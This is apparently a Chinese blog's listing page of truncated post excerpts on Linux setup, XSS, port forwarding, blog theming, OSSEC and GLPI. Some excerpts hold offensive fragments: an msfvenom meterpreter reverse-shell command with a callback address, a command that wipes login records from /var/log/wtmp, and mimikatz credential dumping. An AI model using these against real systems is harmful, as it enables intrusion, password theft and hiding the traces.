台部落小晓晓晓林

1. 使用EPEL安裝 EPEL（Extra Packages for Enterprise Linux）企業版Linux的額外軟件包，是Fedora小組維護的一個軟件倉庫項目，爲RHEL/CentOS提供他們默認不提供的軟件包先確認系

2020-02-29 04:30:03

1、查看系統版本命令 cat /etc/issue 2、查看yum包含的jdk版本 yum search java 或者 yum list java* 版本 jre jdk 1.8 java-1.8.0-openjdk

2020-02-29 04:30:03

xss又稱跨站腳本攻擊，原稱爲css（Cross-Site Scripting），因爲和層疊樣式表(Cascading Style Sheets)重名，所以又稱爲xss(x一般有未知的含義，還有擴展的含義)。 XSS的攻擊原理

2020-02-21 16:52:01

端口轉發&端口映射在實際滲透過程中，我們成功入侵了目標服務器。接着我們想在本機上通過瀏覽器或者其他客戶端軟件訪問目標機器內部網絡中所開放的端口，比如內網的3389端口、內網網站8080端口等等。傳統的方法是利用nc、lcx等工具，進行端

2020-02-21 16:52:01

　　爲了安全起見，公司或者是學校的服務器一般只允許用戶在局域網內登錄，離開內網環境後就沒法登錄服務器，特別不方便。但是在某些情況下，我們又想和服務器進行通信的話，就需要藉助端口轉發來達到目的。　　ssh是一種安全的傳輸協議，通常我

2020-02-21 16:52:01

Linux入侵痕跡清理環境：Centos7、Kali虛擬機等清除登陸系統成功的記錄 [root@localhost root]# echo > /var/log/wtmp //此文件默認打開時亂碼，可查到ip等信息 [root

2020-02-21 16:52:01

前幾天，我寫了一篇關於如何使用GitHub＋Hexo搭建個人博客的博文，接下來我會以我的博客爲例，講講如何對NexT主題的個性化定製和一些細節的優化。前言這篇博客主要是next主題的個性化定製，還有一些細節的優化。在搭建的過

2020-02-21 16:52:01

前言早在初中，就想着自己搭起一個屬於自己的網站，但是沒有技術又不肯學習的我，怯於嘗試，一直停滯不前。大學期間終於學習了，又因爲自己的懶惰，覺得很難，不肯去嘗試。直至今日，我想試一試，搗鼓了好一陣子，發現認真去做了，也沒有想象中的

2020-02-21 16:52:01

EW 是一套便攜式的網絡穿透工具，具有 SOCKS v5服務架設和端口轉發兩大核心功能，可在複雜網絡環境下完成網絡穿透。該工具能夠以“正向”、“反向”、“多級級聯”等方式打通一條網絡隧道，直達網絡深處，用蚯蚓獨有的手段突破網絡限制，給防火

2020-02-21 16:52:01

安裝ossec-server端前提環境準備首先我們安裝需要用到的關聯庫和軟件，由於我們最終是需要把日誌導入到MySQL中進行分析，以及需要通過web程序對報警結果進行展示，同時需要把本機當做SMTP，所以需要在本機安裝MySQL、Apa

2020-02-21 16:52:00

Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o isshell Windows msfvenom -p

2020-02-21 16:52:00

procdump+mimikatz獲取win10用戶明文密碼測試環境：Win10 企業版LTSC 1809 工具下載：k8版本的mz64.exe、procdumpv9.0 原理：獲取到內存文件lsass.exe進程(它用於本地安全和登陸

2020-02-21 16:52:00

GLPI資產管理系統一、簡介資產管理系統是用於幫助管理員管理和跟蹤網絡中計算機及網絡設備的資產信息的軟件。根據具體配置可以獲取到資產的詳細的軟硬件信息及應用軟件的安裝下載情況。 GLPI是法語Gestionnaire libre de

2020-02-21 16:52:00